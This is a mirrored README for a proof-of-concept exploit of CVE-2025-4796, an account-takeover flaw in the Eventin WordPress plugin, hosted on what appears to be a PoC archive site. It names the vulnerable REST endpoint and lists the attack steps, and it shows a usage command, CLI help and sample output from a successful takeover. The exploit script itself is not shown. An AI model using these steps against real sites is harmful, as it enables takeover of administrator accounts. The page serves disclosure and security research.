Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-4796 PoC — Eventin <= 4.0.34 - Authenticated (Contributor+) Privilege Escalation via User Email Change/Account Takeover

Source
https://github.com/Nxploited/CVE-2025-4796
Associated Vulnerability
Title:Eventin <= 4.0.34 - Authenticated (Contributor+) Privilege Escalation via User Email Change/Account Takeover (CVE-2025-4796)
Description:The Eventin plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 4.0.34. This is due to the plugin not properly validating a user's identity or capability prior to updating their details like email in the 'Eventin\Speaker\Api\SpeakerController::update_item' function. This makes it possible for unauthenticated attackers with contributor-level and above permissions to change arbitrary user's email addresses, including administrators, and leverage that to reset the user's password and gain access to their account.
Description
Eventin <= 4.0.34 - Authenticated (Contributor+) Privilege Escalation via User Email Change/Account Takeover
Readme
# CVE-2025-4796
Eventin &lt;= 4.0.34 - Authenticated (Contributor+) Privilege Escalation via User Email Change/Account Takeover

# 🛡️ Eventin <= 4.0.34 - Authenticated (Contributor+) Privilege Escalation (CVE-2025-4796)

## 📌 Overview
This repository documents a privilege escalation vulnerability in the Eventin WordPress plugin (<= 4.0.34) that allows an authenticated user with Contributor+ capabilities to change arbitrary users' email addresses via the plugin's speaker update API. By changing an administrator's email, an attacker can trigger a password reset and gain account takeover.

- Vulnerable component: Eventin WordPress plugin (Eventin\Speaker\Api\SpeakerController::update_item)
- Affected versions: <= 4.0.34
- CVE: CVE-2025-4796
- CVSS: 8.8 (High)




- Active installations: 10,000+

## ⚠️ Vulnerability Details
Eventin does not properly validate the identity or capability of the caller before updating speaker/user details (specifically email). An attacker who is authenticated as a contributor (or higher) can change the email address of other users — including administrators — using the plugin REST endpoint:
- PUT /wp-json/eventin/v2/speakers/<speaker_id>

Once the email is changed to an attacker-controlled address, the standard WordPress password reset flow can be used to take over the account.

## 🧰 Script (PoC)
Filename: `CVE-2025-4796.py`

This script automates the steps:
1. Log in to the target WordPress site using supplied credentials.
2. Extract the required X-WP-Nonce 
3. Send a PUT request to `/wp-json/eventin/v2/speakers/<speaker_id>` to update the speaker's email.
4. Print and format the JSON response and a professional success message.

Requirements:
- Python 3.8+
- requests

Installation:
```sh
pip install requests
```

## 🚀 Usage
Run the script from the command line:

```sh
python CVE-2025-4796.py -u https://target.site -id 9 -email attacker@example.com -user contributor_user -pass contributor_password
```

Show script help:

```sh
python CVE-2025-4796.py -h
```

## 📝 CLI Options (help)
```sh
usage: CVE-2025-4796.py [-h] -u URL -id SPEAKER_ID -email EMAIL -user USERNAME -pass PASSWORD

Exploit For: CVE-2025-4796 By: Nxploited

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress site URL
  -id, --speaker_id SPEAKER_ID
                        Enter the speaker ID for the user
  -email, --email EMAIL
                        Enter a new email address
  -user, --username USERNAME
                        Enter the username for the account to upgrade
  -pass, --password PASSWORD
                        Enter the password for the account to upgrade


```
## ✅ Example Successful Output
```
[*] Please wait, exploitation starting ...
[*] Disabling SSL warnings ...
[*] Logging in to WordPress ...
[+] Logged in successfully.
[*] Extracting nonce value ...
[+] Nonce extracted: fc0ab7b983
[*] Exploiting and updating speaker info ...

[+] Exploitation in progress, please wait ...

[+] Exploitation successful.
[+] The account has been updated to Admin.
    Speaker ID   : 9
    Email        : Nxploited@gmail.com

[!] Please reset your password using the email: Nxploited@gmail.com
```

## ⚖️ Responsible Disclosure & Disclaimer
- This repository is provided for security research, testing, and defensive purposes.
- Do not use these techniques against systems you do not own or do not have explicit authorization to test.
- Unauthorized exploitation of vulnerabilities is illegal and unethical.
- If you are a site owner and believe you are vulnerable, update Eventin to the latest version or apply vendor patches immediately.
- Use this code only in authorized environments (lab, client-approved pen test, or with explicit permission).

## 🧾 What the script does (concise)
- Validates inputs (URL, email) and normalizes URL schema.
- Disables SSL warnings (optional; used to support testing against self-signed dev instances).
- Logs in using provided WP credentials and validates login via cookies.
- Fetches X-WP-Nonce from the admin page.
- Sends an authenticated PUT request to update the speaker's email.
- Prints the formatted JSON response and a final human-readable success summary.

## 👤 Credits
By: Khaled Alenaz (Nxploited)  
GitHub: https://github.com/Nxploited/
File Snapshot

 [4.0K]  /data/pocs/dfc3aea1844162212911a7caf3f59c702a816858
├── [8.7K]  CVE-2025-4796.py
├── [1.5K]  LICENSE
├── [4.2K]  README.md
└── [   9]  requirements.txt

1 directory, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →